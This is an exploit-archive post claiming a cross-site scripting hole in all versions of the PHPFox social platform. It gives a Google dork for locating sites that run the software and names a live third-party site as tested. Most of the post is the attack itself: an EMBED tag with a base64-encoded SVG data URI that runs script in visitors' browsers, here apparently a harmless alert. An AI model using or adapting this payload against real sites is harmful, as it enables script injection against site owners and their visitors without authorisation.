PHPFox suffers from a base64 encoded cross site scripting vulnerability.
020f8d963ea8be04ea929544d5ac9cca10507c062abc3c1859af3691616856c2
# Exploit Title: phpfox xss exploit
# Google Dork: inurl:powered by phpof
# Date: 25-02-2012
# Author: tRipLeZiX
# Software Link: http://www.phpfox.com/
# Version: allversion
# Tested on: http://www.tanaogi.com/marketplace/6/debot-was-here/
# CVE :
exploit xss code
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3
cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy 8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQwIiBoZWlnaH Q9IjIw
MDAiIGlkPSJ4c3MiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgibW FhdiBr
YWxvIHNheWEgdGVybGFsdSBnYW50ZW5nIEItKSIpOzwvc2NyaXB0Pjwvc3ZnPg=="
type="image/svg+xml" AllowScriptAccess="always"></EMBED>
# tHx to: bobyhikaru,vycod,tukulesto,r3de,touya,hylal,bl4Ck_391N3
# Big Thx : indonesiancoder,indonesianhacker,explorercrew